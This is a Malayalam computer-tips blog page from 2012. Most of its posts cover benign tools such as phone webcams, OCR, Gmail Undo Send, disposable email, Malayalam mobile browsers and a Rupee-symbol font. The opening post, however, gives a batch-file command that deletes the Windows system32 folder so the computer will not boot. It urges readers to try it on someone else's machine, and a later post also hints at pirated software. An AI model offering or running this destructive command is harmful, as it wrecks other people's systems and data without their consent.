Sunday 29 January 2012

കമ്പ്യൂട്ടര്‍ എങ്ങിനെ നിശ്ചലമാക്കാം ..



ഈ ട്രിക്ക് നിങ്ങളുടെ കമ്പ്യൂട്ടറില്‍ ചെക്ക്‌ ചെയ്തു എന്ത് സംഭവിച്ചാലും നിങ്ങള്‍ നിങ്ങളുടെ പാട്ടിനു പോകേണ്ടി വരും ..ഒരു രീതിയിലും ഞാന്‍ ഉത്തരവാദി ആകില്ല..



1 - ആദ്യം notpad ഓപ്പണ്‍ ചെയ്യുക
2- del c:\WINDOWS\system32\*.*/q ഈ കാണുന്ന കമാന്‍ഡ് നോട്ട്പാടില്‍ കോപ്പി ചെയ്യുക
3- ശേഷം നോട്ട്പാട് സേവ് ചെയ്യുക.. സേവ് ചെയ്യുമ്പോള്‍ ഏതെങ്കിലും ഒരു പേരിന്റെ കൂടെ .bat അല്ലെങ്കില്‍ .cmd എന്ന് സേവ് ചെയ്യുക..
ഉദാഹരണമായി .. രാഹുല്‍  എന്ന പേരില്‍ ആണ് നിങ്ങള്‍ സേവ് ചെയ്യാന്‍ ഉദ്ദേശിച്ചതെങ്കില്‍ rahul.bat എന്ന് ടൈപ്പ് ചെയ്തു സേവ് ചെയ്യുക..
4- ഇനി പറയുന്നത് ശ്രദ്ധിക്കുക *** സേവ് ചെയ്ത ഫയല്‍ ഒരിക്കലും നിങ്ങള്‍ ക്ലിക്കരുത് ..ക്ലിക്കിയാല്‍ കമ്പ്യൂട്ടറില്‍ ഒന്നും സംഭവിക്കില്ല ...പക്ഷെ സംഭവാമി യുഗേ യുഗേ.. റീസ്റ്റാര്‍ട്ട്‌ ചെയ്താല്‍ സിസ്റ്റം വര്‍ക്ക്‌ ആകില്ല.. അപ്പൊ ഏതെങ്കിലും അലവലാതിയുടെ കമ്പ്യൂട്ടറില്‍ പരീക്ഷണം നടത്തണം എന്ന് സാരം

മൊബൈല്‍ ഫോണ്‍ ക്യമാറ വെബ്‌ ക്യാം ആയ് ഉപയോഗിക്കാം !!!!!!!!



നിങ്ങളുടെ കമ്പ്യൂട്ടറില്‍ വെബ്‌ ക്യാം ഇല്ലെങ്കിലും നിങ്ങളുടെ മൊബൈല്‍ ഉപയോഗിച്ച് ഇനി വീഡിയോ ചാറ്റ് ചെയ്യാം. ഇതിനു വേണ്ടി Mobiolaസോഫ്റ്റ്‌വെയര്‍ നിങ്ങളുടെ കമ്പ്യൂട്ടര്‍ മൊബൈല്‍ ഫോണ്‍ എന്നിവയില്‍ ഇന്‍സ്റ്റാള്‍ ചെയ്യണം. ഇവ തമ്മില്‍ കണക്റ്റ് ചെയ്യാന്‍ കേബിള്‍, വൈഫൈ, ബ്ലൂടൂത്ത് എന്നിവ ഉപയോഗിക്കാം.
Download Mobiola

എന്തിനു നിങ്ങള്‍ ടൈപ്പ് ചെയ്യണം

എന്തിന് വെറുതെ കൈ കുഴക്കണം കമ്പ്യൂട്ടര്‍ തനിയെ ടൈപ്പ് ചെയ്യുമെന്നെ നിങ്ങള്‍ മുന്‍പ് ടൈപ്പ് ചെയ്തു പ്രിന്റ് എടുത്തു വെച്ച ഫയല്‍ കമ്പ്യൂട്ടറില്‍ നിന്നും നഷ്ടപെട്ടുവോ? അതെല്ലെങ്കില്‍ മറ്റൊരാളുടെ ബയോ ഡാറ്റ കോപ്പി അടിച്ച് അതില്‍ നിങ്ങള്ക്ക് വേണ്ട മാറ്റങ്ങള്‍ വരുത്തി മലയാളി സ്റ്റൈലില്‍ ഇന്റര്‍വ്യൂവിന് പങ്കെടുക്കുന്ന ഒരു മഹാനാണോ നിങ്ങള്‍ ?... പേപ്പറില്‍ നോക്കി ടൈപ്പ് ചെയ്യുന്ന ബുദ്ധിമുട്ട് കമ്പ്യൂട്ടറിനെ ഏല്പിച്ചാല്‍ എങ്ങനെ ഇരിക്കും ...? സ്വസ്ഥം അല്ലേ .. കോപ്പി എടുക്കേണ്ട പേപ്പര്‍ സ്കാനര്‍ വഴിയോ ക്യാമറ വഴിയോ കമ്പ്യൂട്ടറില്‍ എത്തിച്ച ശേഷം മിനുട്ടുകള്‍ക്കകം അവ എഡിറ്റ് ചെയ്യാവുന്ന രൂപത്തില്‍ ( ടെക്സ്റ്റ് രൂപത്തില്‍ )മൈക്രോസോഫ്റ്റ് വേര്‍ഡ്‌ ഇല്‍ എത്തിക്കാന്‍ സഹായിക്കുന്ന സോഫ്റ്റ്‌വെയര്‍ കളെ OCR (Optical Character Recognitio) എന്ന് വിളിക്കാം അത്തരം ഒരു സോഫ്റ്റ്‌വെയര്‍ ആണ് Ebby fine reader . ജര്‍മന്‍,ഇംഗ്ലീഷ്,ഫ്രഞ്ച്,സ്പാനിഷ് തുടങ്ങി നിരവധി ഭാഷകള്‍, ഗണിതപരമായ ചിഹ്നങ്ങള്‍ തുടങ്ങിയവ കോപ്പി ചെയ്യാന്‍ Ebby fine reader നു കഴിയും ഇതൊരു സൌജന്യ സേവനം അല്ലെങ്കിലും പതിനഞ്ചു ദിവസത്തെ ട്രയല്‍ വെര്‍ഷന്‍ ഉപയോഗിക്കാനാവും. കൈ കൊണ്ടെഴുതിയതും ഇതു പോലെ ചെയ്യാമെന്നതാണ്‌ എടുത്തു പറയേണ്ട മറ്റൊരു സവിശേഷത ( ഫുള്‍ വെര്‍ഷന്‍ സൌജന്യമായി മറ്റു ചില സൈറ്റുകളില്‍ ലഭ്യമാണ്). Ebby fine reader ഡൌണ്ലോഡ് ചെയ്യാന്‍ ഇവിടെ ക്ലിക്ക് ചെയ്യുക

ഇന്റര്‍നെറ്റ് ഡൌണ്‍ലോഡ് ചെയ്യാമോ ?








കറിയിലിടുന്നത് എന്ത്?
ഉപ്പ്
എന്നാല്‍ ഉപ്പിലിടുന്നതോ?
സ്പൂണ്‍!
ഇതു പോലെയാണ് പലരുടെയും കാര്യം. നമ്മള്‍ പ്രധീക്ഷിക്കാത്ത ചില ചോദ്യങ്ങള്‍ ചോദിക്കും. എന്നാല്‍ അതിന് ശരിയായ ഉത്തരം ഉണ്ടാവു പോലും!

കഴിഞ്ഞ ദിവസം ഒരു ' അജ്ഞാതന്‍' എനിക്ക് മെയില് ചെയ്തു.
ഇന്‍റര്‍നെറ്റില്‍ നിന്നും നമുക്കു ആവശ്യമുള്ളതൊക്കെ ഡൌണ്ലോഡ് ചെയ്യാം , പക്ഷെ ഇന്റര്‍നെറ്റ് മുഴുവനായും എങ്ങനെയാ ഡൌണ്ലോഡ് ചെയ്യുന്നേ?

ചോദ്യം കേട്ട ഞാന്‍ ഒന്നു ഞെട്ടി! ഇന്റര്നെറ്റ് മുഴുവനും ഡൌണ്ലോഡ് ചെയ്യുകയോ?
ചോദിച്ചതല്ലേ , മറുപടി പറയാം എന്ന് ഞാനും കരുതി.

മോനേ അജ്ഞാതാ,
ഇന്റര്നെറ്റ് മുഴുവനായും ഡൌണ്ലോഡ് ചെയ്യണമെന്നുണ്ടെങ്കില്‍ താഴെ കാണുന്ന ബട്ടണ്‍ ക്ലിക്ക് ചെയ്യുക. 'ഒരു കാര്യം പ്രത്യകം ശ്രദ്ധിക്കുക, നിങ്ങളുടെ കമ്പ്യൂട്ടറില്‍ ആവശ്യത്തിനു മെമ്മറി ഉണ്ടല്ലോ അല്ലെ ?


ഇന്റര്നെറ്റ് കണക്ഷന്‍ ഓഫ് ലൈന്‍


ഇന്റര്നെറ്റ് കണക്ഷന്‍ ഓഫ് ലൈന്‍ ആയി കൊണ്ടു തന്നെ ഇനി ഇഷ്ടപെട്ട വെബ്സൈറ്റ് കള്‍ വിസിറ്റ് ചെയ്യാനുള്ള സൌകര്യമോരുക്കുകയാണ് വെബ് അരൂ എന്ന സോഫ്റ്റ്‌വെയര്‍. ലാപ് ടോപ്പ് , പി ഡി ഐ തുടങ്ങിയവയില്‍ വളരെ സൌകര്യപ്രദമായി ഉപയോഗപെടുത്താം.
വെബ് പാക്കുകള്‍ ( വെബ് പേജ് കളുടെ ഫോള്‍ഡര്‍) ഡൌണ്ലോഡ് ചെയ്യുകയാണ് സോഫ്റ്റ്‌വെയര്‍ ചെയ്യുന്നത്.
ഏറ്റവും മികച്ച കണ്ടന്റുകള്‍ കണ്ടതുന്നു വന്നതാണ് ഇതിന്റെ പ്രധാന സവിശേഷത. പല മീഘലകളിലും വെബ് പാക്കുകള്‍ ലഭ്യമാണ് ( കായികം, വാണിജ്യം,...) ഓരോ വെബ് പാക്കിലും നൂറുകണക്കിന് വെബ് പേജുകള്‍ അടങ്ങിയിരിക്കും.
ഇന്ത്യ ക്കാരാനായ രാകേഷ് മാത്തൂര്‍ ആണ് ഈ സോഫ്റ്റ്‌വെയര്‍ വികസിപ്പിച്ചെടുത്തത്. വെബ് അരൂ സോഫ്റ്റ്‌വെയര്‍ അടങ്ങിയാ ഐ സര്‍ ലാപ്റൊപുക വരെ ഇന്നു വിപണിയിലുണ്ട്.

വെബരൂ വിന്റെ സൈറ്റ് ഇല്‍ നിന്നും ഫ്രീ ആയി ഡൌണ്ലോഡ് ചെയ്തെടുക്കാം

അയച്ച ഇ-മെയില്‍ തിരിച്ചെടുക്കാന്‍






എയ്ത അമ്പും, വിട്ട ഇ-മെയിലും തിരിച്ചെടുക്കാന്‍ പറ്റില്ല എന്നാണ് പറയാറ്.അമ്പ് തിരിച്ചെടുക്കാന്‍ പറ്റില്ലായിരിക്കും,എന്നാല്‍ ഇ-മെയിലോ?സംശയിക്കേണ്ട, തിരിച്ചെടുക്കാം...
മെയില്‍ സെന്‍റ് ചെയ്തതിനു ശേഷം ആയിരിക്കും അതില്‍ തെറ്റുണ്ടെന്ന് തോന്നുക,അയക്കേണ്ടിയിരുന്നില്ല എന്ന് തോന്നുക.ഇത്തരം സംശയങ്ങള്‍ നമ്മളില്‍ പലര്‍ക്കും തോന്നിയിട്ടുണ്ടായിരിക്കും.ഇനി പറഞ്ഞിട്ട് കാര്യമില്ല എന്ന് കരുതി നമ്മള്‍ സമാധാനിക്കാറാണ് പതിവ് .എന്നാല്‍ 5 - 10 സെക്കന്റ്‌നുള്ളില്‍ ജി-മെയില്‍ യൂസേര്‍സിന് സെന്‍റ് ചെയ്ത മെയില്‍ തിരിച്ചു വിളിക്കാന്‍ കഴിയും.എങ്ങനെയെന്നല്ലെ...നമുക്ക് നോക്കാം...

അതിനായി ആദ്യം നിങ്ങള്‍ ചെയ്യേണ്ടത് ജി-മെയില്‍ Sign in ചെയ്യുക.അതില്‍ മുകളില്‍ വലതു ഭാഗത്തായി കാണുന്ന Settings എന്നതില്‍ ക്ലിക്കുക.ശേഷം അതില്‍ നിന്നും Labs എന്ന ടാബില്‍ ക്ലിക്കുക. 



അപ്പോള്‍ വരുന്ന ലിസ്റ്റില്‍ നിന്നും Undo Send എന്നത് തിരഞ്ഞെടുക്കുക.അത് Disable എന്നാണെങ്കില്‍ Enable എന്നാക്കി സേവ് ചെയ്യുക.(ചിത്രം കാണുക)



ഇനി നാം അയക്കുന്ന ഇ-മെയിലില്‍ Send ലിങ്ക് ക്ലിക്ക് ചെയ്തു കഴിഞ്ഞാല്‍ Your message has been send ലിങ്കിനടുത്തു തന്നെ Undo ബട്ടനും കാണാന്‍ കഴിയും.ഇത് ഒരു 5 -10 സെക്കന്‍റ് സമയം മാത്രമേ നിലനില്‍ക്കുകയുള്ളൂ.ഈ സമയത്തിനുള്ളില്‍ Undo ചെയ്തിരിക്കണം.(അതായത് ,അയച്ച മെയില്‍ തിരിച്ചു വിളിക്കണമെങ്കില്‍ Undo ക്ലിക്കുക)

ഡിസ്പോസിബിള്‍ ഇമെയില്‍



ചില വെബ്സൈറ്റുകളില്‍ രജിസ്റ്റര്‍ ചെയ്യണമെങ്കില്‍ ഇമെയില്‍ അഡ്രസ്‌ കൊടുക്കേണ്ട അവസ്ഥ വന്നിട്ടുണ്ടാകുമല്ലോ നിങ്ങള്ക്ക് , എന്നാല്‍ പിന്നീട് അവരുടെ ഓഫറുകളും പരസ്യങ്ങളുമായി ഒരുപാട് ചവറ് മെയില്‍ സഹിക്കേണ്ടിയും വന്നിട്ടുണ്ടാകും അല്ലെ . എന്നാല്‍ അതിനൊരു പോം വഴിയാണ് നിങ്ങള്ക്ക് ഞാന്‍ പരിച്ചയപെടുത്തുന്നത് . ഡിസ്പോസിബിള്‍ മെയില്‍ അഡ്രസ്‌ വെറും പത്തു മിനിറ്റ് ആയുസുള്ള മെയില്‍ അഡ്രസ്‌ http://10minutemail.com/  ഒരു തരത്തിലുള്ള രെജിസ്ട്രേഷനും ആവശ്യമില്ല . നിങ്ങള്‍ ഈ കാണുന്ന വെബ്സൈറ്റില്‍ ഒന്ന് വിസിറ്റ് ചെയ്‌താല്‍ മാത്രം മതി നിങ്ങള്‍ക്കുള്ള മെയില്‍ അഡ്രസ്‌ അവിടെ റെഡി ആയിട്ടുണ്ടാകും .എന്നാല്‍ ആയുസ് വെറും പത്തു മിനിറ്റ് ആണെന്ന കാര്യം മറക്കല്ലേ ..............

മൊബൈല്‍ ഫോണില്‍ മലയാളം


മൊബൈല്‍ ഫോണില്‍ മലയാളം സൈറുകളും അക്ഷരങ്ങളും വായിക്കുക എന്നത് എല്ലാ മലയാളികളുടെയും  ആഗ്രഹമാണ് .എന്നാല്‍ സാധാരണയായി ഇത് മൊബൈല്‍ ഫോണില്‍ സാധിക്കില്ല .അതിനുള്ള പരിഹാരമായി മൊബൈല്‍ ഫോണില്‍ മലയാളം  വായിക്കാന്‍ സഹായിക്കുന്ന വഴിയാണ്  താഴെ നല്‍കിയിരിക്കുന്നത്.ഇതിനു വേണ്ടത് മലയാളം വായിക്കാന്‍ യോഗ്യമായ ബ്രൌസര്‍ മൊബൈല്‍ ഫോണില്‍ ഡൌണ്‍ലോഡ് ചെയ്യുകയാണ് . നിലവില്‍ മലയാളം യോഗ്യമായ ബ്രൌസര്‍  താഴെ കൊടുക്കുന്നു . ഈ  ബ്രൌസര്‍ ഒരുവിധം വിലകുറഞ്ഞ മൊബൈല്‍ ഫോണുകളിലും വര്‍ക്ക്‌ ചെയ്യുന്നുണ്ട് . 
ബോള്‍ട്ട് ഇന്‍ഡിക് ബ്രൌസര്‍
                മലയാളം മൊബൈല്‍ ഫോണില്‍ വായിക്കാന്‍ സഹായിക്കുന്ന മറ്റൊരു ബ്രൌസര്‍ ആണ് ബോള്‍ടിന്റെ ഇന്ത്യന്‍ ഭാഷ യോഗ്യമായ   ബ്രൌസര്‍ . ഇതിനു വേണ്ടി വെബ്‌സൈറ്റില്‍ ( boltbrowser.com  ) നിന്നും ബോള്‍ട്ട് ഇന്‍ഡിക് വെര്‍ഷന്‍ സെലക്ട്‌ ചെയ്തു ഡൌണ്‍ലോഡ് ചെയ്യുക . കൂടുതല്‍ വിവരങ്ങള്‍ മലയാളത്തില്‍ വായിക്കുവാന്‍  ഇവിടെ ക്ലിക്ക് ചെയ്യുക . നേരിട്ട് ഡൌണ്‍ലോഡ് പേജിലേക്ക് പോകുവാന്‍ ഇവിടെ  ക്ലിക്ക് ചെയ്യുക അല്ലെങ്കില്‍ താഴെ കാണുന്ന ലിങ്കില്‍ നിന്നും ഡൌണ്‍ലോഡ് ചെയ്യുക  . 

നിങ്ങളുടെ ഫോണിലേക്ക് ഡൌണ്‍ലോഡ് ചെയ്യാന്‍ താഴെ കാണുന്ന നാലു ലിങ്കില്‍ നിന്നും ഒന്ന് സെലക്ട്‌  ചെയ്യുക . ഇതില്‍ ഒന്ന് തീര്‍ച്ചയായും ഡൌണ്‍ലോഡ് ആവും .

1.Unsigned version 

download 1


2.thawte signed version

download 2


3.verisign signed version

download 3

4.dual signed version

download 4

മൊബൈലില്‍ ഫ്രീ ഇന്റര്‍നെറ്റ്‌ വീഡിയോ കാള്‍





മൊബൈലില്‍ ചാറ്റ് ചെയ്യാന്‍ ഉപയോഗിക്കാവുന്ന നിരവധി സോഫ്റ്റ്‌വെയറുകള്‍ ഇന്ന് ലഭ്യമാണ് .
എന്നാല്‍ ഇതില്‍ നിന്നും വ്യത്യസ്തമായ ഒരു സോഫ്റ്റ്‌വെയര്‍ ആണ് ഫ്രിംഗ് .

രജിസ്റ്റര്‍ ചെയ്താല്‍  നിങ്ങള്‍ക്കും നിങ്ങളുടെ വിദേശ രാജ്യങ്ങളിലുള്ളതും നാട്ടിലുള്ളതുമായ സുഹൃത്തുക്കളുമായി വീഡിയോ വോയിസ്‌ കാള്‍ ചെയ്യാന്‍ സാധിക്കും .  രജിസ്റ്റര്‍ ചെയ്യുംബോള്‍ കിട്ടുന്ന യുസര്‍നൈം ഉപയോഗിച്ച് ഫ്രണ്ട്സിനെ  ആഡ് ചെയ്യാനും കഴിയും . മറ്റുള്ള സോഫ്റ്റ്‌വെയര്‍ പോലെ തന്നെ നിങ്ങളുടെ യാഹൂ , ഗൂഗിള്‍ , ഹോട്മെയില്‍ ,  തുടങ്ങിയ അക്കൌണ്ടുകളും ഇതിലൂടെ ഓപ്പണ്‍ ചെയ്യാന്‍ കഴിയും .
   
                                                 കൂടാതെ ഫ്രിംഗ്  അപ്ലിക്കേഷന്‍ ഉപയോഗിക്കുന്ന നിങ്ങളുടെ സുഹൃത്തുക്കളുമായി വീഡിയോ ക്യാമറ ഉള്ള ഫോണ്‍ വഴി ത്രീജി(3G) അല്ലെങ്കില്‍ വയര്‍ലെസ്സ് ഇന്റര്‍നെറ്റ്‌ വഴി ഫ്രിംഗ് ടു ഫ്രിംഗ് വീഡിയോ കാള്‍ അല്ലെങ്കില്‍ വോയിസ്‌ കാള്‍ ചെയ്യുവാനും ഇതില്‍   കഴിയും .



                നിങ്ങളുടെ യാഹൂ , ഗൂഗിള്‍ സുഹൃത്തുക്കളുമായും വോയിസ്‌ കാള്‍ ചെയ്യാന്‍ ഇതിലൂടെ സാധിക്കും . ഓണ്‍ലൈനില്‍ ഉള്ളവരുമായി ഫയലുകള്‍ , ഫോട്ടോ ,വീഡിയോ എന്നിവ അയക്കാനും സാധിക്കും .

         നോക്കിയ ഫോണില്‍ ഈ സോഫ്റ്റ്‌വെയര്‍ ഡൌണ്‍ലോഡ് ചെയ്യാന്‍ഇവിടെ ക്ലിക്ക് ചെയ്യുകയോ അല്ലെങ്കില്‍ ഒവി (ovi) സ്റ്റോറില്‍ നിന്നോ  ഡൌണ്‍ലോഡ് ചെയ്യുക  .N73 തുടങ്ങിയ ചില ഫോണുകളില്‍ വീഡിയോ കാള്‍ സപ്പോര്‍ട്ട് ചെയ്യുന്നില്ല . എന്നാല്‍ 6120c തുടങ്ങിയ ഫോണുകള്‍ ഇത് സപ്പോര്‍ട്ട് ചെയ്യുന്നുണ്ട് .

         ഫ്രിംഗ് വെബ്സൈറ്റ് അഡ്രസ്‌ fring.com  
                   



രൂപയുടെ ചിഹ്നം എങ്ങനെ ടൈപ്പ് ചെയ്യാം ?


Rupee Symbol Installation in Ubuntu/Linux
  1. Download Rupee_Foradian.ttf font from —
2. Open terminal (Application – Accessories – Terminal) and type the command
sudo cp /home/changathi/Desktop/Rupee_Foradian.ttf /usr/share/fonts/truetype/freefont/Press Enter
In the place of home/changathi/Desktop give the path of Rupee_Foradian.ttf font you have downloaded.
In the above command note a space after sudo,cp & ttf
3. If asked give the user password of your system.
4. Then in terminal type the command,
fc-cache Press Enter
Close the Terminal
Open Word Processor
Select font – Rupee Foradian
Press the Key ~ ` (That is Left side of key 1 or Below of Escape key or Above of Tab key)
Rupee Symbol will appear.
Rupee Symbol Installation in WINDOWS
1. Download Rupee_Foradian.ttf font from —
  1. Copy the Rupee font and paste it into the folder C – windows – fonts
  2. Open Microsoft Word
  3. Select font – Rupee Foradian
  4. Press the Key ~ ` (That is Left side of key 1 or Below of Escape key or Above of  Tab key)
Rupee Symbol will appear.